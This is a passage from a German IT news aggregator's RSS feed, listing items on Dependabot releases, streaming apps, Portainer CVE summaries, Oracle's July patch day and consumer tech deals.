<li>Type dependency requirement readers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4943567484" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15646" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15646/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15646">#15646</a></li>
<li>v0.388.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4925212017" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15623" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15623/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15623">#15623</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/currantw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/currantw">@currantw</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4933037458" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15632" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15632/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15632">#15632</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.387.0...v0.388.0"><tt>v0.387.0...v0.388.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FRITZ! startet gebührenpflichtige PLUS-Pakete]]></title>
<description><![CDATA[FRITZ! erweitert das eigene Angebot und führt unter dem Namen Service PLUS kostenpflichtige Support-Optionen für FRITZ!-Produkte ein. Während der Standard-Support weiterhin kostenlos...Zum Beitrag: FRITZ! startet gebührenpflichtige PLUS-Pakete

Wo du uns folgen kannst:
Facebook, Reddit, Google Ne...]]></description>
<link>https://tsecurity.de/de/3687444/it-nachrichten/fritz-startet-gebuehrenpflichtige-plus-pakete/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687444/it-nachrichten/fritz-startet-gebuehrenpflichtige-plus-pakete/</guid>
<pubDate>Wed, 22 Jul 2026 21:34:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FRITZ! erweitert das eigene Angebot und führt unter dem Namen Service PLUS kostenpflichtige Support-Optionen für FRITZ!-Produkte ein. Während der Standard-Support weiterhin kostenlos...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/fritz-startet-gebuehrenpflichtige-plus-pakete/">FRITZ! startet gebührenpflichtige PLUS-Pakete</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Galaxy Z Fold 8, Fold 8 Ultra und Flip 8 vorbestellen: Das bekommt ihr bei Amazon kostenlos obendrauf]]></title>
<description><![CDATA[Samsung hat mit dem Galaxy Z Fold 8, Fold 8 Ultra und Flip 8 seine neuen Falthandys vorgestellt. Wer sie jetzt bei Amazon vorbestellt, kann sich einen kostenlosen Bonus sichern.
																					Dieser Artikel wurde einsortiert unter 
																	Smartphone,																	Amazon,						...]]></description>
<link>https://tsecurity.de/de/3686840/it-nachrichten/galaxy-z-fold-8-fold-8-ultra-und-flip-8-vorbestellen-das-bekommt-ihr-bei-amazon-kostenlos-obendrauf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686840/it-nachrichten/galaxy-z-fold-8-fold-8-ultra-und-flip-8-vorbestellen-das-bekommt-ihr-bei-amazon-kostenlos-obendrauf/</guid>
<pubDate>Wed, 22 Jul 2026 17:25:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Samsung hat mit dem Galaxy Z Fold 8, Fold 8 Ultra und Flip 8 seine neuen Falthandys vorgestellt. Wer sie jetzt bei Amazon vorbestellt, kann sich einen kostenlosen Bonus sichern.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/smartphone/index.html">Smartphone</a>,																	<a href="https://www.netzwelt.de/hersteller/amazon.html">Amazon</a>,																	<a href="https://www.netzwelt.de/technology/index.html">Technology</a>,																	<a href="https://www.netzwelt.de/schnaeppchen/index.html">Schnäppchen</a>,																	<a href="https://www.netzwelt.de/handy/index.html">Handy</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Build an LLM Agent That Can Write and Run Code]]></title>
<description><![CDATA[A hands-on walkthrough of code execution with the OpenAI Agents SDK and Docker
The post Build an LLM Agent That Can Write and Run Code appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3686571/ai-nachrichten/build-an-llm-agent-that-can-write-and-run-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686571/ai-nachrichten/build-an-llm-agent-that-can-write-and-run-code/</guid>
<pubDate>Wed, 22 Jul 2026 15:48:18 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A hands-on walkthrough of code execution with the OpenAI Agents SDK and Docker</p>
<p>The post <a href="https://towardsdatascience.com/build-an-llm-agent-that-can-write-and-run-code/">Build an LLM Agent That Can Write and Run Code</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[So einfach streamen Sie hunderte TV-Sender kostenlos & live am Handy]]></title>
<description><![CDATA[Keine Antenne, kein Kabelanschluss, kein Abo: Auf Ihrem Android-Smartphone oder iPhone können Sie Hunderte TV-Sender kostenlos und legal livestreamen – etwa die WM-Spiele in der U-Bahn oder Ihre Lieblingsspielfilme im Freibad. Wir erklären Ihnen, welche Apps sich lohnen und wie Sie sie einrichten...]]></description>
<link>https://tsecurity.de/de/3686514/windows-tipps/so-einfach-streamen-sie-hunderte-tv-sender-kostenlos-live-am-handy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686514/windows-tipps/so-einfach-streamen-sie-hunderte-tv-sender-kostenlos-live-am-handy/</guid>
<pubDate>Wed, 22 Jul 2026 15:35:35 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Keine Antenne, kein Kabelanschluss, kein Abo: Auf Ihrem Android-Smartphone oder iPhone können Sie Hunderte TV-Sender kostenlos und legal livestreamen – etwa die WM-Spiele in der U-Bahn oder Ihre Lieblingsspielfilme im Freibad. Wir erklären Ihnen, welche Apps sich lohnen und wie Sie sie einrichten.</p>



<h2 class="wp-block-heading">ARD Mediathek und ZDF: Öffentlich-rechtlich, kostenlos, ohne Einschränkungen</h2>



<p>Den einfachsten Einstieg bieten die Apps der öffentlich-rechtlichen Sender. Die <strong>ARD Mediathek</strong> (<a href="https://play.google.com/store/apps/details?id=de.swr.avp.ard&amp;hl=de" target="_blank" rel="noreferrer noopener">Android</a> / <a href="https://apps.apple.com/us/app/ard-mediathek/id981496660" target="_blank" rel="noreferrer noopener">iPhone</a>) gibt Ihnen Zugriff auf Live-TV von Das Erste, den Dritten Programmen, arte, tagesschau24 und weiteren Sendern sowie eine Mediathek mit Sendungen, die bis zu 30 Tage nach Ausstrahlung abrufbar sind.</p>



<p>Die <strong>ZDF-App</strong> (<a href="https://play.google.com/store/apps/details?id=com.zdf.android.mediathek&amp;hl=de" target="_blank" rel="noreferrer noopener">Android</a> / <a href="https://apps.apple.com/de/app/zdf/id437025413" target="_blank" rel="noreferrer noopener">iPhone</a>) funktioniert nach demselben Prinzip und deckt ZDF, ZDFneo und ZDFinfo ab. Beide Apps sind kostenlos, werbefrei und erfordern keine Anmeldung.</p>



<p><strong>So starten Sie den Live Stream in der ARD Mediathek:</strong></p>



<ol class="wp-block-list">
<li>Öffnen Sie die App nach der Installation.</li>



<li>Tippen Sie unten in der Navigation auf “Live”.</li>



<li>Wählen Sie einen Sender aus und tippen Sie darauf, um den Stream zu starten.</li>
</ol>



<p><strong>Tipp: </strong>Es gibt ein kostenloses Tool, mit dem Sie das gesamte Angebot von ARD, ZDF, Arte und vielen weiteren öffentlich-rechtlichen Sendern direkt auf Ihr Handy (oder den PC) laden können. <a href="https://www.pcwelt.de/article/2912972/mediathekview-so-laden-sie-filme-serien-von-ard-und-zdf-gratis-herunter.html" target="_blank" rel="noreferrer noopener">Hier erfahren Sie, wie es geht.</a></p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Joyn: Private Sender kostenlos im Stream</h2>



<p>Mit <strong>Joyn</strong> (<a href="https://play.google.com/store/apps/details?id=de.prosiebensat1digital.seventv&amp;hl=de" target="_blank" rel="noreferrer noopener">Android</a> / <a href="https://apps.apple.com/de/app/joyn-deine-streaming-app/id826510222" target="_blank" rel="noreferrer noopener">iPhone</a>) kommen die großen Privatsender dazu. Ohne Anmeldung empfangen Sie über 60 Sender wie ProSieben, SAT.1, Kabel eins und DMAX. Mit einem kostenlosen Joyn-Konto schalten Sie noch mehr Inhalte frei. Joyn+ für 6,99 Euro im Monat entfernt die Werbung und fügt HD-Qualität hinzu, ist aber für den Grundbetrieb nicht nötig.</p>



<p><strong>So starten Sie den Live Stream mit Joyn:</strong></p>



<ol class="wp-block-list">
<li>Laden und installieren Sie die Joyn-App aus dem Play Store oder App Store.</li>



<li>Öffnen Sie die App. Sie müssen sich nicht anmelden.</li>



<li>Tippen Sie auf “Live TV” in der unteren Navigation und wählen Sie einen Sender.</li>
</ol>


<div class="extendedBlock-wrapper block-coreImage center"><figure data-wp-context='{"imageId":"6a60c70f20ba4"}' data-wp-interactive="core/image" class="wp-block-image aligncenter size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Joyn-App.png?w=1200" alt="Joyn App" class="wp-image-3184313" width="1200" height="819" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Über “Live TV” erreichen Sie in Joyn direkt das laufende Programm aller verfügbaren Live-TV-Sender.</p>
</figcaption></figure><p class="imageCredit">PC-Welt</p></div>



<h2 class="wp-block-heading">Zattoo: Über 170 Sender in der Gratis-Version</h2>



<p><strong>Zattoo</strong> (<a href="https://play.google.com/store/apps/details?id=com.zattoo.player&amp;hl=de">Android</a> / <a href="https://apps.apple.com/de/app/zattoo-tv-streaming-app/id423779936">iPhone</a>) bietet mit seiner kostenlosen Version eines der umfangreichsten Gratisangebote im deutschsprachigen Raum: über 170 Sender in einem klassischen TV-Guide-Format. </p>



<p>Ein kostenloses Konto ist erforderlich, die Registrierung dauert aber nur wenige Minuten. Kostenpflichtige Tarife ab 6,99 Euro im Monat fügen HD-Qualität, Timeshift und Aufnahmefunktion hinzu. Einen vollständigen Anbietervergleich finden Sie in unserem Artikel <a href="https://www.pcwelt.de/article/2339774/tv-ohne-kabel-waiputv-zattoo-joyn-iptv.html" target="_blank" rel="noreferrer noopener">TV ohne Kabel: WaipuTV, Zattoo, Joyn &amp; Co. – die besten IPTV-Anbieter im Überblick</a>.</p>



<p><strong>So richten Sie Zattoo ein:</strong></p>



<ol class="wp-block-list">
<li>Laden Sie die Zattoo-App herunter und öffnen Sie sie.</li>



<li>Tippen Sie auf “Registrieren” und legen Sie ein kostenloses Konto an.</li>



<li>Bestätigen Sie Ihre E-Mail-Adresse über den Link in der Bestätigungsmail.</li>



<li>Melden Sie sich an und tippen Sie auf einen Sender, um den Stream zu starten.</li>
</ol>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Pluto TV: Hunderte Themenkanäle ohne Anmeldung</h2>



<p><strong>Pluto TV</strong> (<a href="https://play.google.com/store/apps/details?id=tv.pluto.android&amp;hl=de">Android</a> / <a href="https://apps.apple.com/de/app/pluto-tv-film-serien-tv/id751712884">iPhone</a>) funktioniert anders als klassische TV-Apps: Statt linearer Fernsehsender bietet die Plattform über 250 kuratierte Themenkanäle, die rund um die Uhr Inhalte zu bestimmten Themen senden; angefangen von Krimis über Dokumentationen bis zu internationalen Nachrichten. Alles ist kostenlos, werbefinanziert und ohne Registrierung nutzbar.</p>



<p><strong>So starten Sie das Live-Streaming mit Pluto TV:</strong></p>



<ol class="wp-block-list">
<li>Installieren Sie die App und öffnen Sie sie.</li>



<li>Tippen Sie auf “Live TV” in der unteren Navigation.</li>



<li>Scrollen Sie durch die Kanalliste oder nutzen Sie die Suche, um einen passenden Kanal zu finden.</li>



<li>Tippen Sie auf einen Kanal, um den Stream sofort zu starten.</li>
</ol>



<p><strong>Beim Thema Streaming: </strong>Lohnen sich die Abos für Netflix, Prime Video und Co. überhaupt noch? <a href="https://www.pcwelt.de/article/1158913/streaming-vergleich-netflix-prime-video-disney-co.html" target="_blank" rel="noreferrer noopener">Unser großer Vergleich von Netflix, Prime Video, Disney+ und Co. gibt die Antwort.</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[80er-Kultserien kostenlos ohne Abo streamen: Mit nur 2 Folgen versteht ihr den neuen He-Man-Film bei Amazon viel besser]]></title>
<description><![CDATA[Die 80er-Kultvorlage zum neuen Masters-of-the-Universe-Film könnt ihr jetzt völlig kostenlos ohne Abo streamen. Zwei kurze Folgen bereiten euch perfekt auf den Stream bei Amazon vor und lassen euch das Ende viel besser verstehen.]]></description>
<link>https://tsecurity.de/de/3686403/it-nachrichten/80er-kultserien-kostenlos-ohne-abo-streamen-mit-nur-2-folgen-versteht-ihr-den-neuen-he-man-film-bei-amazon-viel-besser/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686403/it-nachrichten/80er-kultserien-kostenlos-ohne-abo-streamen-mit-nur-2-folgen-versteht-ihr-den-neuen-he-man-film-bei-amazon-viel-besser/</guid>
<pubDate>Wed, 22 Jul 2026 15:06:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die 80er-Kultvorlage zum neuen Masters-of-the-Universe-Film könnt ihr jetzt völlig kostenlos ohne Abo streamen. Zwei kurze Folgen bereiten euch perfekt auf den Stream bei Amazon vor und lassen euch das Ende viel besser verstehen.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-44850 | portainer Community Edition up to 2.33.7/2.39.1/2.40.x Portainer-mediated Docker API authorization (GHSA-7fw3-x4r2-g7wc)]]></title>
<description><![CDATA[A vulnerability was found in portainer Community Edition up to 2.33.7/2.39.1/2.40.x. It has been classified as critical. Affected is an unknown function of the component Portainer-mediated Docker API. Performing a manipulation results in incorrect authorization.

This vulnerability was named CVE-...]]></description>
<link>https://tsecurity.de/de/3686056/sicherheitsluecken/cve-2026-44850-portainer-community-edition-up-to-23372391240x-portainer-mediated-docker-api-authorization-ghsa-7fw3-x4r2-g7wc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686056/sicherheitsluecken/cve-2026-44850-portainer-community-edition-up-to-23372391240x-portainer-mediated-docker-api-authorization-ghsa-7fw3-x4r2-g7wc/</guid>
<pubDate>Wed, 22 Jul 2026 13:03:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/portainer:community_edition">portainer Community Edition up to 2.33.7/2.39.1/2.40.x</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function of the component <em>Portainer-mediated Docker API</em>. Performing a manipulation results in incorrect authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-44850">CVE-2026-44850</a>. The attack may be initiated remotely. There is no available exploit.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-44849 | portainer Community Edition up to 2.33.7/2.39.1/2.40.x Docker Swarm Service API authorization (GHSA-5fxq-qcf3-244w)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in portainer Community Edition up to 2.33.7/2.39.1/2.40.x. The impacted element is an unknown function of the component Docker Swarm Service API. The manipulation leads to missing authorization.

This vulnerability is documented as CVE-2026-44...]]></description>
<link>https://tsecurity.de/de/3686053/sicherheitsluecken/cve-2026-44849-portainer-community-edition-up-to-23372391240x-docker-swarm-service-api-authorization-ghsa-5fxq-qcf3-244w/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686053/sicherheitsluecken/cve-2026-44849-portainer-community-edition-up-to-23372391240x-docker-swarm-service-api-authorization-ghsa-5fxq-qcf3-244w/</guid>
<pubDate>Wed, 22 Jul 2026 13:03:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/portainer:community_edition">portainer Community Edition up to 2.33.7/2.39.1/2.40.x</a>. The impacted element is an unknown function of the component <em>Docker Swarm Service API</em>. The manipulation leads to missing authorization.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-44849">CVE-2026-44849</a>. The attack can be initiated remotely. There is not any exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Gratis bei Amazon: 19 Kindle-E-Books mit Liebe, Spannung und praktischen Tipps]]></title>
<description><![CDATA[Auch heute gibt es bei Amazon wieder zahlreiche Kindle-E-Books kostenlos. Unter den 19 Gratis-Titeln finden sich Liebesromane, spannende Krimis und praktische Ratgeber.]]></description>
<link>https://tsecurity.de/de/3685782/it-nachrichten/gratis-bei-amazon-19-kindle-e-books-mit-liebe-spannung-und-praktischen-tipps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685782/it-nachrichten/gratis-bei-amazon-19-kindle-e-books-mit-liebe-spannung-und-praktischen-tipps/</guid>
<pubDate>Wed, 22 Jul 2026 11:20:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Auch heute gibt es bei Amazon wieder zahlreiche Kindle-E-Books kostenlos. Unter den 19 Gratis-Titeln finden sich Liebesromane, spannende Krimis und praktische Ratgeber.]]></content:encoded>
</item>
<item>
<title><![CDATA[3,52 % bei Autobank: Stellantis bietet Top-Zins beim Tagesgeld]]></title>
<description><![CDATA[Die Stellantis Direktbank bietet Neukunden beim Tagesgeld ab sofort einen starken Aktionszins. Wer sein Geld flexibel parken will, erhält eine monatliche Zinsgutschrift, die Kontoführung ist kostenlos.]]></description>
<link>https://tsecurity.de/de/3685660/it-nachrichten/352-bei-autobank-stellantis-bietet-top-zins-beim-tagesgeld/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685660/it-nachrichten/352-bei-autobank-stellantis-bietet-top-zins-beim-tagesgeld/</guid>
<pubDate>Wed, 22 Jul 2026 10:34:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Stellantis Direktbank bietet Neukunden beim Tagesgeld ab sofort einen starken Aktionszins. Wer sein Geld flexibel parken will, erhält eine monatliche Zinsgutschrift, die Kontoführung ist kostenlos.]]></content:encoded>
</item>
<item>
<title><![CDATA[Oracles Juli-Updates beseitigen weit über 1000 Sicherheitslücken]]></title>
<description><![CDATA[Der US-amerikanische Software-Hersteller Oracle hält nur alle drei Monate einen turnusmäßigen Patch Day ab. Oracle spricht dabei von „Critical Patch Updates“ (CPU). Aufgrund des umfangreichen Produktportfolios sowie des relativ langen Update-Turnus fallen dabei regelmäßig mehrere hundert zu besei...]]></description>
<link>https://tsecurity.de/de/3685615/it-nachrichten/oracles-juli-updates-beseitigen-weit-ueber-1000-sicherheitsluecken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685615/it-nachrichten/oracles-juli-updates-beseitigen-weit-ueber-1000-sicherheitsluecken/</guid>
<pubDate>Wed, 22 Jul 2026 10:20:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Der US-amerikanische Software-Hersteller Oracle hält nur alle drei Monate einen turnusmäßigen Patch Day ab. Oracle spricht dabei von „Critical Patch Updates“ (CPU). Aufgrund des umfangreichen Produktportfolios sowie des relativ langen Update-Turnus fallen dabei regelmäßig mehrere hundert zu beseitigende Lücken an. Im Juli sind, dem Trend bei anderen Herstellern folgend, 1449 Schwachstellen zusammengekommen – das ist die mit großem Abstand höchste Anzahl, seit es CPU-Tage gibt und mehr als im gesamten Jahr 2025.</p>



<p>Wegen der starken Zunahme der durch „KI“-Tools entdeckten Schwachstellen hat Oracle seit dem <a href="https://www.pcwelt.de/article/3120729/oracles-april-updates-beseitigen-fast-500-sicherheitslucken.html" data-type="link" data-id="https://www.oracle.com/security-alerts/cpuapr2026.html" target="_blank" rel="noreferrer noopener">vorherigen CPU-Tag im April</a> zusätzlich monatliche Sicherheits-Updates eingeführt. Die so genannten „Critical Security Patch Updates“ (CSPU) erscheinen weiterhin am dritten Dienstag eines Monats. Bislang ist Java nicht davon betroffen – das wird sich jedoch bereits im August ändern.</p>



<p>Etliche der beseitigten Schwachstellen sind als kritisch einzustufen. Angaben dazu, ob Schwachstellen bereits für Angriffe ausgenutzt werden (0-Day-Lücken), macht Oracle in seinem aktuellen Sicherheitsbericht nicht. Für die Risikobewertung nutzt Oracle den Industriestandard CVSS 3.1 (Common Vulnerability Scoring Standard), dessen höchster Wert 10.0 ist. Auch Microsoft gibt seit einiger Zeit einen CVSS-Score für beseitigte Sicherheitslücken an.</p>



<p><a href="https://www.pcwelt.de/article/3191057/microsofts-monster-patchday-sprengt-alle-rekorde.html" target="_blank" rel="noreferrer noopener">▶Microsofts Monster-Patchday sprengt alle Rekorde</a></p>



<h2 class="wp-block-heading toc">Die dicksten Brocken</h2>



<p>Die meisten Sicherheitslücken hat Oracle beim <a href="https://www.oracle.com/security-alerts/cpujul2026.html" data-type="link" data-id="https://www.oracle.com/security-alerts/cpujul2026.html" target="_blank" rel="noreferrer noopener">CPU-Tag im Juli</a> in seiner bis dahin eher unauffälligen E-Business Suite geschlossen. Von 410 Schwachstellen sind 45 ohne Benutzeranmeldung über das Netzwerk ausnutzbar und eine erreicht den hohen CVSS-Score 9.8. Nicht weit dahinter folgt Fusion Middleware mit 355 Sicherheitslücken, von denen 46 aus der Ferne ausnutzbar sind und zehn den CVSS-Score 10.0 erreichen.</p>



<p>Diesmal erst an dritter Stelle liegt Oracles Produktfamilie für die Telekommunikationsbranche (Communications). Von den 168 geschlossenen Lücken sind 122 ohne Benutzeranmeldung über das Netzwerk ausnutzbar, 12 davon erreichen den CVSS-Score 9.8. In den Fußnoten nennt Oracle über 160 weitere Schwachstellen, die beseitigt, aber nicht mitgerechnet sind. PeopleSoft kommt auf 84 Lücken, von denen 45 ohne Benutzeranmeldung über das Netzwerk ausnutzbar sind und sechs den CVSS-Score 9.9 erreichen.</p>



<p>Beim quelloffenen Datenbank-Server MySQL nennt Oracle 54 behobene Schwachstellen. Hier sind neun Lücken ohne Benutzeranmeldung über das Netzwerk ausnutzbar und eine erreicht den CVSS Score 8.5. Die neuesten verfügbaren MySQL-Versionen (MySQL Community Server) sind 9.7.1 (LTS – Long Term Support) und 8.4.10 (LTS). Der Versionszweig 8.0 hat mit dem CPU-Tag im April das Support-Ende erreicht, die letzte Version ist 8.0.46.</p>



<h2 class="wp-block-heading toc">Java-Updates für sechs Versionen</h2>



<p>In Java SE (Standard Edition) hat Oracle insgesamt 19 Sicherheitslücken geschlossen (CVSS-Höchstwert 7.8), von denen 17 ohne Benutzeranmeldung übers Netzwerk ausnutzbar sind. Anders als bislang üblich hat Oracle den nächsten Update-Termin für Java bereits für den 18. August angekündigt. Ab 2027 soll Java monatliche Sicherheits-Updates erhalten. Den halbjährlichen Turnus für Feature-Updates (neue Hauptversionen) will Oracle hingegen beibehalten.</p>



<p>Das im März freigegebene Java 26 erhält sein zweites Sicherheits-Update, das zehn Lücken stopft. Nach einem dritten Update im August wird Java 26 bereits im September durch Java 27 abgelöst.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Java 25 ist hingegen eine LTS-Version (Long Term Support) und soll bis Sommer 2033 gepflegt werden. Auch Java 21, Java 17 und Java 11 sind LTS-Versionen. Sie werden acht Jahre lang mit Updates versorgt, Java 11 sogar bis 2032. Der neueste Stand sind die Versionen 25.0.4, 21.0.12, 17.0.20 und 11.0.32. Wer Java 21 kommerziell nutzt, benötigt dafür ab Oktober 2026 eine kostenpflichtige Lizenz. Für Java 25 gilt dies ab Oktober 2028. Für private Nutzung sowie für Entwickler bleibt jedoch weiterhin alles kostenlos.</p>



<p>Für Anwender bleibt laut Oracle weiterhin vorwiegend <a href="https://www.pcwelt.de/article/1134876/java-runtime-environment-jre.html" target="_blank" rel="noreferrer noopener" title="Download">Java 8</a> (JRE – Java Runtime Environment) relevant und von Oracle empfohlen. Die neueste Version ist Java 8 Update 501 (8u501). Darin hat Oracle 18 Schwachstellen beseitigt. Unternehmen und Behörden müssen seit April 2019 für die Java-8-Updates zahlen, Privatpersonen und Entwickler nicht.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihre Programme stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Lücken in VirtualBox</h2>



<p>In der quelloffene Virtualisierungslösung <a href="https://www.pcwelt.de/article/1135009/system-software-virtualbox-windows.html" data-type="link" data-id="https://www.pcwelt.de/article/1135009/system-software-virtualbox-windows.html" target="_blank" rel="noreferrer noopener" title="Download">VirtualBox </a>hat Oracle 16 Schwachstellen (max. CVSS 7.8) beseitigt, von denen keine übers Netzwerk ausnutzbar ist. Womöglich lässt es die eine oder andere der Lücken zu, Code aus der VM auf dem Host-System auszuführen. Die neue, abgesicherte VirtualBox-Version ist 7.2.14. Der ältere Versionszweig 7.1 hat mit dem CPU-Tag im April das Ende der Fahnenstange erreicht: Oracle beendet den Support.</p>



<p>Der nächste turnusmäßige Oracle CPU-Tag ist am 20. Oktober 2026. Seit April 2022 sind diese Termine stets am dritten Dienstag im Januar, April, Juli und Oktober. Seit Mai 2026 werden je nach Dringlichkeit auch monatlich Updates bereitgestellt, die eingangs erwähnten CSPU.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Versteckte VLC-Funktion gibt euch 1.800 TV-Sender kostenlos, ohne Abo und ohne Anmeldung]]></title>
<description><![CDATA[Der VLC Media Player kann weit mehr als Videos abspielen. Ganz schnell wird er zum vollwertigen TV-Center mit 1.800 Sendern.]]></description>
<link>https://tsecurity.de/de/3685483/it-nachrichten/versteckte-vlc-funktion-gibt-euch-1800-tv-sender-kostenlos-ohne-abo-und-ohne-anmeldung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685483/it-nachrichten/versteckte-vlc-funktion-gibt-euch-1800-tv-sender-kostenlos-ohne-abo-und-ohne-anmeldung/</guid>
